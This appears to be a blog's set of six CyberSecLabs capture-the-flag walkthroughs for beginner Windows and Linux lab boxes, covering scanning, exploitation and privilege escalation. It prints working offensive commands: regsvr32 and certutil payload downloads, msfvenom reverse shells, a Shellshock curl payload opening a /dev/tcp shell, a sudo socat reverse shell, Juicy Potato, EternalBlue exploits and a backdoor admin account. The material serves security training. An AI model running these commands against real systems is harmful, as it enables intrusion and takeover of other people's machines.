CyberSecLabs – “Imposter” Walkthrough

CyberSecLabs

Imposter from CyberSecLabs is a beginner level Windows box hosting a Wing FTP server. After gaining access to the web admin console, we’ll get a reverse shell as a low privileged user and find a interesting way to escalate our privileges using a module in Meterpreter.

Imposter’s IP address is 172.31.1.20.

Let’s get started.

Scanning and Enumeration

I’ll start with a simple Nmap scanning for all TCP ports with service enumeration enabled.

nmap -sV -p- 172.31.1.20

In the output we see multiple open ports, let’s drill into these and figure determine what to focus on first.

135 – Microsoft RPC
139/445 – Microsoft SMB
1025-1037 – More MSRPC ports
3389 – Remote Desktop
5958 – Port used by Evil Win-RM
8080 – HTTP port hosting Wing FTP Server
47001 – Higher HTTP port

While we have multiple ports open most of the services being hosted on those ports require authentication and therefore credentials before we can connect to and utilize them.

The one port that stands to me is port 8080. It’s hosting a Wing FTP Web server. Let’s browse to this page and investigate.

172.31.1.20:8080/admin_login.html

Bam. We find an administrative login page for Wing FTP. Let’s try a couple of weak and or default password combinations. I recommend doing this anytime you find a login page. It won’t always be an easy win but sometimes you get lucky.

In this case I tried a few different username/password combinations. Admin/admin. Root/root. Admin/password. The last one worked!

We are logged in as Admin to the Wing FTP administration console.

Wing FTP Server – Administration

Enumerate the Wing FTP site and you’ll find a Console under the Administration tab. Here we can issue commands on the target.

WingFTP Administration Console

Exploitation

We have access to the Wing FTP administrative console. I’ll do a simple Help command to show what we can do here with the console.

With console access to the target via the web server we should be able to spawn a reverse shell. I noticed quickly this console doesn’t allow you to copy/paste into it. You can of course type out the commands but let’s look at another more efficient way.

WingFTP Console – Help output

Start Burp Suite on your Kali Box. You’ll also need to configure your in browser settings for the Burp proxy which defaults to port 8080. Instructions can be found online easily, a common browser extension called FoxyProxy allow you to easily switch back and forth between different proxies.

With the Burp Proxy enabled, enter the Help command into the Wing FTP console. In Burp under the Proxy tab, you should see the HTTP request.

Burp Proxy – Viewing the HTTP Request for “Help”.

Right click on the whitespace inside Burp, and select “Send to Repeater“. Now we can issue commands to the web server and view the output at the same time. Click Send to process the request once more. Now we see the Help command output in the Response screen on the right.

Burp Repeater – Help output

Since we are executing commands via a web server, we can utilize a Metasploit module to assist us. Multi/Script/Web_Delivery will provide us with a command to issue from the web server. It will download and execute a payload via regsvr32.exe to bypass application whitelisting. Once it executes the reverse shell will connect to our Metasploit session and spawn a Meterpreter prompt.

use multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set SRVPORT 8081
set SRVHOST 0.0.0.0
set target 3
set LPORT 4445
run

After configuring the Metasploit module options, we hit Run and get the command to run on the target machine.

You’ll need to add quotes and os.execute before the command: os.execute(‘cmd.exe /c “regsvr32 /s /n /u /i:http://10.10.0.22:8081/8oPg6T.sct scrobj.dll”‘)

Command=os.execute(‘cmd.exe /c “regsvr32 /s /n /u /i:http://10.10.0.22:8081/8oPg6T.sct scrobj.dll”‘)

Back in Metasploit we see the payload was received and a Meterpreter session has been established.

Meterpreter session established from 172.31.1.20

Privilege Escalation

With access to the target as the low privileged user Lian we can start to enumerate the system and find our path to privilege escalation.

I’ll begin the process by running a simple command to check what privileges our current user has.

whoami /priv

The Lian user has SeImpersonatePrivilege enabled. This allows us to, you guessed it, impersonate a user after authentication. We could look into various Potato attacks, which hinge on this user privilege. However we can make use of a built in feature of the Meterpreter payload a module called Incognito.

Type “Load Incognito” from your Meterpreter prompt to load the module.

Meterpreter Incognito Commands

Help command will list out available commands to be used. First we will use the List_tokens command to view available tokens for our current user.

We see below that we have available tokens for NT AUTHORITY\SYSTEM. That’s what we need, so let’s use it and complete the box.

Use the Impersonate_token command followed by “NT AUTHORITY\SYSTEM” and you’ll elevate your Meterpreter shell to SYSTEM.

list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM”
getuid

Capture the Flags!

From here its a simple matter of capturing the flags.

There you have it. Imposter from CyberSecLabs. A beginner level box that demonstrates the importance of trying weak or default passwords on web servers. We then explored a interesting way of getting a reverse shell to execute from the web server using Burp repeater. Finally to escalate our access to system we used the Incognito module in Meterpreter to impersonate the NT AUTHORITY token.

CyberSecLabs – “Weak” Walkthrough

CyberSecLabs

Weak from CyberSecLabs is a beginner box hosting a FTP file share and Mircorosft IIS web server . We’ll use Nmap and Nikto to enumerate and find a foothold. For privilege escalation we will discover a common Windows privesc path manually without using automated tools like winPEAS.

Weak’s IP Address is 172.31.1.11

Let’s get started.

Scanning and Enumeration

I’ll begin with our standard Nmap scan: -sC for default scripts, and -sV for service enumeration.

First thing I notice at the top is port 21. FTP is open and since we ran our Nmap scan with default scripts we see that anonymous login is allowed. That’s most likely our initial entry point. I see port 80 is hosting a Microsoft IIS web server. Beyond that we have Microsoft SMB ports and an assortment of higher level ports. Those don’t interest me at the moment, let’s focus on those first two for now (21, 80).

nmap -sC -sV 172.31.1.11

Continuing to review our Nmap results we have the Host Scripts results section. Here we learn the machine’s operating system is Windows 7 Ultimate Service pack 1. That information could be useful to us later, so make a note. Nothing else to report here. Let’s move on and enumerate the interesting open ports.

Nmap results – continued

I ran the Nikto vulnerability web scanner on port 80. Nothing to interesting to report here, but we are able to confirm Microsoft IIS 7.5 is running and it’s a default installation. Which does have known vulnerabilities we might be able to leverage.

nikto -h 172.31.1.11

First let’s connect to FTP on port 21 as the anonymous user. If you haven’t done this before you can enter any password you like when prompted. Again for first time FTP users, you can use the HELP command to get a list of commands. I first start with a ls command to list the contents of the directory. I receive an error message. Again if you’ve used FTP before, then you’ve likely encountered this. All you need to do is enter the “passive” command to switch to Passive mode. After you’ll see I’m able to use the ls command successfully.

The directory contents appear to be in the web root folder, which is the root folder used for port 80. In most default IIS installs you’ll find a welcome.png image file.

ftp 172.31.1.11
anonymous
1234
ls
passive
ls

If we browse to the IP address and open the image in a new window. You’ll see that the welcome.png is the IIS logo image. This confirms the FTP directory is in the web root folder. So anything we upload to FTP we can then view or execute in our browser. Sound useful?

172.31.1.11/welcome.png

Exploitation

We’ve discovered a default IIS installation combined with a open FTP share in the web root directory. All we need to do is upload a reverse shell payload and execute it to gain access to the target. We will do this with MSFvenom.

The payload parameters took me a few tries to get right, mainly the file extension. I wasn’t sure initially which files IIS would accept and execute. So I tried a few and found success with the .aspx file extension.

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.0.22 lport=4444 -f aspx > shell.aspx

With the payload created we need to transfer shell.aspx to the target. We’ll do this using the FTP client.

Like before you’ll connect to FTP with anonymous login, enable passive mode, and use the put command to transfer the file. Verify the file transferred successfully with a ls command.

ftp 172.31.1.11
anonymous
1234
passive
put shell.aspx
ls

After the reverse shell is transferred to the target setup a Netcat listener on the port specified in your msfvenom payload. With the listener running, navigate to 172.31.1.11/shell.aspx to execute the reverse shell.

nc -lvnp 4444
whoami

Great! We have a low privileged shell as the IIS apppool/alpha site user. The Netcat shell is kinda limited so let’s upgrade it to a Meterpreter shell. That’ll give us more flexibility.

To start we need to create a meterpreter payload msfvenom. Our file type here will be a windows executable.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.22 LPORT=4321 -f exe > shell.exe

Now we will transfer the meterpreter payload using Certutil. This is a built-in utility included on most Windows operating systems and my go-to tool for windows file transfers.

cd C:\inetpub\wwwroot\
certutil -urlcache -f http://10.10.0.22/shell.exe shell.exe
dir
shell.exe

With the meterpreter payload on the target machine, we need to launch MSFconsole and configure a Exploit/Multi/Handler. Set the parameters to match your port and IP Address and run the handler.

options
run
getuid

All we need to do now is execute shell.exe and wait for the Meterpreter session to connect. Awesome, we a nice Meterpreter prompt with lots of built in options and flexibility. That will help us during the next phase.

Privilege Escalation

Privesc on this box will be a bit different, in that I won’t be running WinPEAS or any automated scripts to help us here. I found this path on my own by utilizing the whoami /priv command. It’s a good habit to run this command on any Windows box you get access to, it might lead you to towards a quick win or at least point you in the right direction for escalation.

Running whoami /priv reveals we have the SeImpersonatePrivilege privilege enabled. This allows us perform a Juicy Potato attack.

whoami /priv

What is a Juicy Potato attack?

Juicy Potato is a variant of RottenPotatoNG which leverages the privilege escalation chain based on the BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges.

Basically, if you have the SeImpersonate or SeAssignPrimaryToken privileges enabled for your account, you can perform this type of local privilege escalation attack.

To launch a Juicy Potato attack we will need a couple of arguments.

JuicyPotato.exe – Required Arguments

JuicyPotato.exe -l [Any_Port] -p [Program_To_Execute] -t * -c
[CLSID_Value
]


[Any_Port] = Any working port that is not blocked by the windows
[Program_To_Execute] Path to a msfvenom exe reverse shell that will be executed and connect back to our attacker machine.
[CLSID_Value] We need to find the correct CLSID value from the list.

So the only thing we need to search for would be the CLSID value. These values are operating system specific. If you refer back to the Github page, you can download the CLSID list for whichever Windows operating system you need.

https://github.com/ohpe/juicy-potato/tree/master/CLSID

We know from our scanning and enumeration that the target is a Windows 7 system. So make sure you get the Windows 7 CLSID list.

To get started we need a couple of files transferred to the target.

JuicyPotato.exe – The executable to launch the attack
TestCLSID.bat – This bat script will test each CLSID value included in CLSID.list
CLSID.list – The list of operating system specific CLSID values to test. This list feeds the TestCLSID.bat script.

Make sure to upload JuicyPotato.exe, TestCLSID.bat and CLSID.list to same folder on the target machine.

Transferring the Juicy Potato files to the target using Meterpreter.

Start the TestCLSID.bat script and allow it to run for about 5 minutes. This should allow enough time to collect a CLSID running as the NT Authority/SYSTEM user.

TestCLSID.bat

Cat out the contents of the result.log and we should see many CLSID’s. Select anyone of the CLSID’s that is running under the NY Authority/SYSTEM account.

cat result.log

With the CLSID value selected we are ready to launch Juicypotato.exe. Refer back to the syntax above and fill in the arguments. I’ll be reusing my shell.exe file from before since its located in the same folder as the Juicy potato files.

You will need to configure the Exploit/Multi/Handler in Metasploit again for the new shell we are about to spawn.

juicypotato.exe -l 1337 -p C:\inetpub\wwwroot\shell.exe -t * -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}

Run the exploit and wait for the session to be opened.

run
getuid

Boom. We are NY Authority/SYSTEM. We’ve owned this box. Now all that’s left is…

Capture the Flags!

type “C:\Users\Web Admin\Desktop\access.txt”
type “C:\Users\Administrator\Desktop\system.txt”

So that’s Weak from CyberSecLabs. A beginner box where we exploit a FTP file share/IIS web server with anonymous access to get a reverse shell and eventually launch a token impersonation attack using Juicy Potato to escalate our privilege to NY Authority. This was my first time using Juicy Potato and doing token impersonation and it was a great learning experience.

CyberSecLabs – “Shock” Walkthrough

CyberSecLabs

Shock from CyberSecLabs is a beginner Linux box hosting a Apache web server. We’ll use Nikto to discover a Bash vulnerability that we can use to get a shell. To complete the box we’ll use some basic Linux privesc techniques to escalate to root.

The IP address for Shock is 172.31.1.3.

Scanning and Enumeration

I start out with Nmap scan with -sC for default scripts, -sV for service enumeration, and -p- to scan all 65535 TCP ports.

nmap -sC -sV -p- 172.31.1.3

We have FTP open on 21, SSH on 22, and a web server hosted on port 80.

FTP is a common initial attack vector, but in this case it doesn’t look like we have anonymous access. Usually SSH isn’t very interesting, its mostly used after we’ve already got our initial foothold. Let’s dig into the web server being hosted on port 80. I’ll use the Nikto web vulnerability scanner for this.

nikto -h 172.31.1.3

Nikto takes a while to complete but that’s because when run with default options it scans for over 7,000 known vulnerabilities.

Buried in the output we find a juicy bit of information. We have a page that is vulnerable to Shellshock! Hey, that makes sense since the box is named Shock.

Exploitation – Metasploit Route

We have a vulnerability now let’s find an exploit. I’ll start with Searchsploit to see what’s available for Shellshock.

searchsploit shellshock

There’s several exploits available including Metasploit modules. So fire up msfconsole and let’s do a search. This time I’ll search for the exact CVE number we discovered earlier with Nikto.

search CVE-2014-6278

I’ll start with the first exploit. This is the second one down in our search results, because the first is an auxiliary module which will not result in a shell.

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 172.31.1.3
set TARGETURI /cgi-bin/test.cgi
run
getuid

We receive a low privileged shell. We’ll need to escalate our privileges to get root on this system. You can skip ahead if you wish but I recommend trying the manual route.

Exploitation – Manual Route

So we’ve got a shell the easy way with Metasploit now let’s try and do it by exploiting Shellshock manually.

Before we get any further let’s understand how Shellshock works. I found this graphic from Symantec helpful.

Symantec – Shellshock

After some googling I landed on this post which provided a helpful walk through for testing and exploiting Shellshock.

The first part of the article explains how to test for the vulnerability. We’ll use a simple ping command executed after the environmental variable is setup, and the arbitrary command.

I’ll setup a Netcat listener on port 1234 and then use curl to craft the HTTP request.

curl -H ‘User-Agent: () { :; }; /bin/bash -c ‘ping -c 3 10.10.0.41:1234” http://172.31.1.3/cgi-bin/test.cgi

nc -lvnp 1234

Great we get a response from the web server. This indicates our command was executed successfully. Instead of the ping command let’s insert a bash reverse shell one liner. You can find plenty of reverse shell cheat sheets with this command.

Setup the netcat listener and then run the following command with curl to spawn a bash reverse shell.

curl -H ‘User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.0.41/1234 0>&1’ http://172.31.1.3/cgi-bin/test.cgi

nc -lvnp 1234
whoami

On our netcat listener we have a reverse shell as the www-data user.

Privilege Escalation

We have our initial low privileged shell. Now let’s see what’s available on this box to escalate our privileges and get root.

Normally, when you aren’t sure where to start on PrivEsc (Privilege escalation) you can always run automated tools to help you. LinPEAS is probably one of the best and most popular tools. But there are many others.

As a rule on any Linux system I get access to, I always check what SUDO permission that current user has. More often than not, if you run Sudo -l and you find a binary listed, that will be your method of escalation.

sudo -l

Here we see the www-data has SUDO permissions to run a binary called socat. I’m not that familiar with socat myself, but I know it has similar functionality to Netcat, in that we can use it to create connections between a port and an IP address. So how do we figure out how to use socat? Google of course!

If you haven’t already bookmarked this site. Please do. GTFOBins. Always, always, always lookup a binary you have permissions to on GTFO Bins.

There we find a way to abuse limited SUID privileges and create a reverse shell connection. Just modify the IP Address and port and run the command with sudo.

sudo socat tcp-connect:10.10.0.41:1234 exec:/bin/sh,pty,stderr,setsid,sigint,sane

sudo socat tcp-connect:10.10.0.41:1234 exec:/bin/sh,pty,stderr,setsid,sigint,sane

On our netcat listener we see the reverse shell connected.

nc -lvnp 1234
whoami
hostname

Now we have a shell as the root user. All that’s left is to capture the flags.

Capture the Flags!

cat /home/scott/access.txt
cat /root/system.txt

There you have it. Two methods for exploiting Shock from CyberSecLabs. I found the manual method to be a great way to learn how the bash vulnerability works and how to test for it. Privilege escalation wasn’t difficult but reinforced the basics you’ll need for any capture the flag type scenario.

CyberSecLabs – “Lazy” Walkthrough

CyberSecLabs

Lazy from CyberSecLabs is a quick and excellent beginner box that only requires a few skills to achieve root. Basic nmap scanning, service enumeration, and exploitation through Metasploit. No privilege escalation required, and it does have a lazy feel to it.

Lazy’s IP address is 172.31.1.1

Scanning

I start with a Nmap scan running default scripts, and service enumeration against the target’s IP address.

nmap -sC -sV 172.31.1.1

Nmap shows SSH, HTTP, and SMB ports open. SSH isn’t a typical entry point for most beginner boxes, its mostly used after you’ve either obtained credentials, or cracked a password hash. HTTP obviously hosts a web server, in this case Nginx 1.1.19. Lastly, we have the SMB ports of 139 and 445.

Service Enumeration

I start with checking out the Nginx web server on port 80.

172.31.1.1 – Nginx web server
Nothing much here.

Not much there to be honest. We could run Nikto, and further enumerate Nginx. Which I did and didn’t find anything interesting.

That leaves us with SMB. If you look back at the original nmap scan, in the Host-script results section. There we see the Samba version is 3.6.25.

I ran a nmap script to enumerate shares against the target. Which revealed a \home\Public share that we can read/write to with anonymous access enabled.

nmap -p 445 –script=smb-enum-shares.nse 172.31.1.1

Let’s confirm our Nmap results are accurate with Smbmap.

smbmap -u ” -p ” -H 172.31.1.1

Smbmap is making a connection with a “” or blank user and a blank password, which otherwise equals anonymous user access. In the Public folder we have Read/Write access. This confirms the Nmap script results.

Exploitation

I start by running Searchsploit for Samba 3.6.25. If you don’t get the same result, try updating the Searchsploit repository with the –update switch.

searchsploit samba 3.6.25

Awesome we have a Metasploit module. The ‘is_known_pipename’ exploit loads a hacked library file into a vulnerable samba server and provides a reverse shell. There are a few requirements for this module to work properly.

  • A writable samba share is required or valid credentials to a samba share that allows write access to the share.
  • Knowledge of the server side location path of the writable share.

We have a writable share, \home\Public and we know that we can access the share anonymous thus providing valid credentials. Given our Nmap, and Smbmap results we have satisfied all the requirements to run the exploit successfully.

Fire up msfconsole and search for “is_known_pipename”.

search is_known_pipename

Load the is_known_pipename module. Set the module parameters, in this case all that’s needed is the RHOSTS IP address.

use exploit/linux/samba/is_known_pipename
set RHOST 172.31.1.1
run
python -c ‘import pty;pty.spawn(“/bin/bash”)’

Run the exploit. The payload is uploaded to \\172.31.1.1\Public\ and shortly after a command shell session is opened. We’ve got our reverse shell.

It’s a crappy shell, just a blank cursor, the first thing we want to do is upgrade it and spawn python bash prompt. Always keep this command handy, or better yet memorize it.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Notice now we have nice root@lazy prompt!

Lazy AF

Capture all the flags!

cat /home/adam/access.txt
cat /root/system.txt

There you have it. Nice and easy. With only a couple of tools, and a few techniques we achieved root. Lazy and Eternal from CyberSecLabs are the boxes you should start with if you are new to pentesting or CTFs.

CyberSecLabs – “Cold” Walkthrough

CyberSecLabs

Cold from CyberSecLabs is a beginner level Windows box with a remote service exploit, that shows the importance of initial enumeration and directory discovery. After gaining initial access we’ll again abuse a service to elevate our privilege.

Cold’s IP address is 172.31.1.15.

Scanning and HTTP Enumeration

We start with scanning. Here I’ve used a simple nmap with the -sV switch to enable Service Enumeration. This will show us what version of a service is running if available.

nmap -sV 172.31.1.15

Let’s review the open ports.

  • HTTP = 80, 443, 5500, 8500
  • SMB = 139, 445
  • MSRPC = 135, 49152-49155, 49161

So we have several ports hosting HTTP services, which is usually a juicy attack vector along with SMB, and a handful of high numbered RPC ports.

Nikto is written by Chris Sullo and David Lodge.

Now is a good time to talk about one of my favorite tools for HTTP enumeration and that is the Nikto Web Vulnerability Scanner.

Nikto is a free open source web server scanner, which scans a target website against 6000+ tests. Including scans for vulnerabilities, mis-configurations, out-dated versions, and much more. Nikto comes installed with Kali Linux, but you can installed it yourself by grabbing the latest release from Github.

Because so many different types of checks are included with Nikto, I’ve made it a practice to run Nikto on any HTTP port I encounter. In the case of Cold, we have 3 possible ports to scan with Nikto. Nothing interesting really for ports 80, or 5500, but when we run Nikto on 8500 we do find something interesting buried in the output.

Nikto has found an Administrator login page for ColdFusion!

nikto -h 172.31.1.35:8500

Navigate to http://172.31.1.15:8500/CFIDE/administrator/ in your browser and we have the ColdFusion administrator login page.

Navigating to http://172.31.1.15:8500/CFIDE/administrator/ reveals a Adobe ColdFusion admin login.

What do you do when you find a administrative login page? Try to login with the most basic default passwords… such as admin/admin. Hey, what do you know…

I’m in

Now we have credentials and admin access to the ColdFusion Developer console. Now what? I haven’t encountered Coldfusion before, so I don’t really know what to do with this access. Poke around and do your enumeration.

Logged into ColdFusion administration with Developer rights.

So we have ColdFusion, now we need to find an exploit.

Exploitation: Getting a reverse shell

I’ll use Searchsploit to quickly see what exploits are available for ColdFusion. You see we have several exploits for ColdFusion. Since this is a beginner box lets focus on the Metasploit modules.

searchsploit coldfusion
Rapid7’s Metasploit

Launch msfconsole and search for ColdFusion exploit modules. I see a total of 4 exploit/ modules. The exploit/ category in Metasploit is for exploits that will result in a interactive command shell.

Searching for Coldfusion modules in Metasploit.

Starting from the top, the first exploit runs on Linux. Cold is a Windows machine, so that’s out. Let’s check out the next exploit, since it will run on Windows.

The exploit will take advantage of the Ckeditor feature of ColdFusion to upload a file without authentication. So we don’t even need the credentials we discovered for ColdFusion.

Load the exploit module. Set the parameters, and then launch the exploit. It will return a simple jsp reverse shell.

Loading the exploit module. Setting the parameters. Launching the exploit.
use exploit/multi/http/coldfusion_ckeditor_file_upload
set RHOSTS 172.31.1.15
set LHOST 10.10.0.41
options
exploit

Our simple jsp reverse shell works for initial access, but let’s upgrade it to a meterpreter session so we don’t encounter problems later. That will make privilege escalation a bit easier, as right now, we are limited by our jsp shell.

I create the payload with msfvenom. You can find several cheat sheets online for payloads. This generates a meterpreter reverse shell inside a simple .exe file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.41 LPORT=1234 -f exe > shell.exe

To transfer files on windows my favorite tool is certutil. So that’s what I’ll use to get shell.exe. You’ll also need to host the file, so we can access it on the network. Python SimpleHTTPServer will do will do that for us.

certutil.exe -urlcache -f http://10.10.0.41/shell.exe shell.exe

You’ll see the HTTP request after you run the certutil.exe command.

Here you see the HTTP Request for the file.
python -m SimpleHTTPServer 80

Start a new Metasploit session and fire up the exploit/multi/handler to receive the meterpreter shell.

After you’ve started the exploit/multi/handler go back to your original meterpreter shell and launch the shell.exe file.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.0.41
set LPORT 1234
run

Privilege Escalation

winPEAS

We have our low privilege shell but now we need to scan the target to find our escalation path to system. One of best and most popular tools for doing this is the PEASS – Privilege Escalation Awesome Scripts SUITE. You can get it here.

Since certutil.exe worked to transfer the first meterpreter shell, we’ll use it again. Make sure you still have your python http server running to host the file.

certutil.exe -urlcache -f http://10.10.0.41/winPEAS.exe winPEAS.exe
HTTP Request for winPEAS.exe

Now I can run winPEAS.exe like any executable. It has a lot of output. I scrolled down until I found the Services Information.

winPEAS.exe output

At the bottom, we can modify the “cold” service. Not only does it contain an unquoted service path we can WriteData/CreateFiles. So we can change the configuration of the service to run an executable of our choosing. Since we already have our meterpreter shell on the target, lets reuse that.

Our shell is located in C:\ColdFusion2018\cfusion\bin\. We need to change the service’s configuration binpath to the shell.exe path. We’ll do that using “sc” a built-in windows command line utility for managing services.

sc config cold binpath=”C:\ColdFusion2018\cfusion\bin\shell.exe”
sc start cold
Receiving the reverse shell as NT Authority and watching it die after about 30 seconds.

Notice our meterpreter session died, approximately 30 seconds after starting. We have a error message indicating a problem starting the service, and mostly likely a timeout was reached so it killed the process. If you are really fast, you could type out the access.txt and system.txt files since you have the shell for a brief period of time.

Maintaining Access

Instead of racing to beat the 30 second timeout on the reverse shell, let’s create a persistent session. First we create a new user, and then we add that user to the local admin group.

net user outrunsec Outruns3c! /add

net localgroup administrators outrunsec /add

To utilize the new outrunsec account, we will connect to it using a great penetration testing framework. Evil-WinRM.

Evil-WinRM

Evil-WinRM takes advantage of the Windows Remote Management feature included on servers. It has a lot of features, primarily for post-exploitation. We will only be using it to create a session and get a command prompt. You can get and learn more about Evil-WinRM here.

evil-winrm -i 172.31.1.15 -u outrunsec -p ‘Outruns3c!’
whoami
type C:\Users\Administrator\Desktop\system.txt
type C:\Users\jade\Desktop\access.txt

There you have it. Cold from CyberSecLabs.

This was my first time encountering Adobe ColdFusion, which I learned to pay attention to all HTTP ports and enumerate them with Nikto. Privilege escalation was good practice at service exploitation, along with how to deal with a unstable root shell.

CyberSecLabs – “Eternal” Walkthrough

CyberSecLabs

Eternal from CyberSecLabs is a Window box with a well known SMB remote code execution exploit. I’ll show you how to exploit it with Metasploit, and using a OSCP approved manual tool.

My first Capture the Flag Write-up!

Let’s get started. We are working on Eternal from CyberSecLabs which is a Windows box that lives at 172.31.1.10.

Scanning

I start with the following Nmap scan. This is my favorite scan to start with. It does not work in all scenarios against all targets, but it usually provides enough information to get you started.

nmap -sC -sV -oN nmap 172.31.1.10

  • -sC = Runs default scripts
  • -sV = Enables Service Version Scanning
  • -oN = Outputs scan results into a file named “nmap” using the nmap format
Nmap -sC -sV -oN nmap 172.31.1.10

Interestingly we don’t have typical services running like SSH, and FTP. Also no web server being hosted, on port 80. This is important because it tells us something about our initial attack vector. We don’t have FTP, or a Web server to exploit for our initial access. So we will focus on the SMB range of ports which are 135, 139, and specifically 445.

Now I will continue use nmap to gather more information about our target. To see what Nmap scripts we have available we can do the following ls command. We’ll use smb-vuln* to show all scripts related to SMB vulnerabilities.

ls -ls /usr/share/nmap/scripts/smb-vuln*

ls -ls /usr/share/nmap/scripts/smb-vuln*

I could run a scan that checked for all the smb vulnerabilities in nmap.

nmap –script=smb-vuln* 172.31.1.10

However that takes awhile, and either way you’ll reveal the same information. Let’s run the following nmap script scan to check if the target is vulnerable to MS17-010.

nmap -p 445 172.31.1.10 –script=smb-vuln-ms17-010

Nmap -p 445 172.31.1.10 –script=smb-vuln-ms17-010

In the Host script results section we see the target is vulnerable to MS17-010. Otherwise known as Eternal Blue! The name of the box is a dead giveaway.

Searching for MS17-010 Exploits

An excellent tool we can use to find exploits quickly, is the Searchsploit command. Which searches the local Exploit-DB repository on Kali Linux.

Searchsploit ms17-010

There’s multiple exploits available, including a couple Metasploit modules.

Exploiting Eternal Blue – Metasploit Route

I’ll explain a bit about Metasploit since this box is aimed at beginner’s.

The Metasploit Framework is a suite of tools that allows you to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. It’s truly the Pentesters best friend, especially when you are starting out.

msfconsole

This will launch the Metasploit framework console.

msfconsole

At the msf5 prompt. Search for MS17-010 modules. We want to use exploit/windows/smb/ms17_010_etnernalblue. Show the options, and as usual we need to set the remote hosts IP address, the RHOSTS parameter. Set RHOSTS to 172.31.1.10.

Search MS17-010
Use exploit/windows/smb/ms17_010_eternalblue
Options
set RHOSTS 172.31.1.10

Always a good idea to confirm the module parameters are correct before launching your exploit. Type “options” to show the module options.

Confirm exploit parameters. Verify RHOSTS address is 172.31.1.10

The exploit is ready to go. Type “run” or if you want to feel more like a hacker you can use “exploit” as well to launch the exploit.

Exploit
whoami
hostname

I’ve seen this exploit fail a few times, before it eventually succeeds, if your exploit doesn’t work the first try, be patient. The exploit results in a simple CMD shell, so you don’t have a Meterpreter prompt to interact with. I simply started typing something like the “whoami” command. This confirms we have a NT Authority SYSTEM shell. From this shell, we could capture both the user flag, and the root flag. Boom. Done.

Exploitation with AutoBlue

So you’ve seen how easy Eternal Blue is to exploit with Metasploit. Now we will use a more manual way of exploiting Eternal Blue which can be located here.

To get started, git clone the repository to your local machine or download the files from Github. CD into the AutoBlue directory, and you’ll several exploit files and and shellcode folder. Before we go any further lets confirm this exploit will work on our target. To do this I run the Eternal_Checker.py script. It tells us that the target is not patched, indicating the presence of the vulnerability.

AutoBlue also includes a exploit that relies on a named piped. To test this we can attempt to run the zzz_exploit.py script. This will fail, and you’ll note in the status it tells us that it could not find an accessible named pipe.

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
ls
python eternal_checker.py 172.31.1.10
python zzz_exploit.py 172.31.1.10

If we navigate into the shellcode directory, we find a helpful script named shell_prep.sh. This is not necessary as all this script does is generate a payload using msfvenom. You can easily do this yourself, but since this is included I wanted to demonstrate how it works. It’s also helpful, in that it generates the payload, and displays the msfvenom syntax its using to build the payload. Just copy that line and run it to generate the same payload.

I set my LHOST, and the ports for both x86, and x64 listeners. This is important, if you aren’t sure if the target is 64-bit or 32-bit architecture. I’m opting to build a regular ole CMD shell instead of a Meterpreter shell. I’m also selecting to make this payload a “stageless” payload. This means the entire payload will be sent at once, instead of in “stages”. Each payload is generated with msfvenom, 64 bit and 32 bit and stored in the shellcode directory.

Launching ./shell_prep.sh

With our payloads generated, we need to setup our listeners on the ports we specified in our shell_prep. Those are 4444 and 4446. Now, AutoBlue also includes a listener_prep.sh script. However, I won’t be using this since all we need here is a simple netcat listener setup for each port. Go ahead and start a netcat listener in a new terminal window.

nc -lvnp 4444
nc -lvnp 4446

  • -l = listener mode
  • -v = verbose output
  • -n = no name resolution. Doesn’t perform DNS lookups
  • -p = local port

With your netcat listener running, its time to launch the exploit. AutoBlue includes exploits for multiple Windows operating systems, and for this target we will use the eternablue_exploit7.py script. You’ll need to specify the target IP address, and the path to the sc_all.bin file. This is located inside the shellcode directory. Now, run the exploit.

Launching the exploit.
python eternalblue_exploit7.py 172.31.1.10 /root/CSL/Eternal/AutoBlue-MS17-010/shellcode/sc_all.bin

You should almost instantly receive a reverse shell connection to your netcat listener. If you don’t get a reverse shell within a few seconds, double check you have everything set correctly. I received this on port 4444 which indicates the target is 64-bit architecture. I type in the “whoami” command to confirm that our shell is indeed running as NT Authority SYSTEM.

Receiving the NT Authority reverse shell on port 4444 using a Netcat listener.
nc -lvnp 4444
whoami
hostname

Thanks for reading, I hope you found this helpful.

Stay tuned for more write-ups, walk-through’s and more.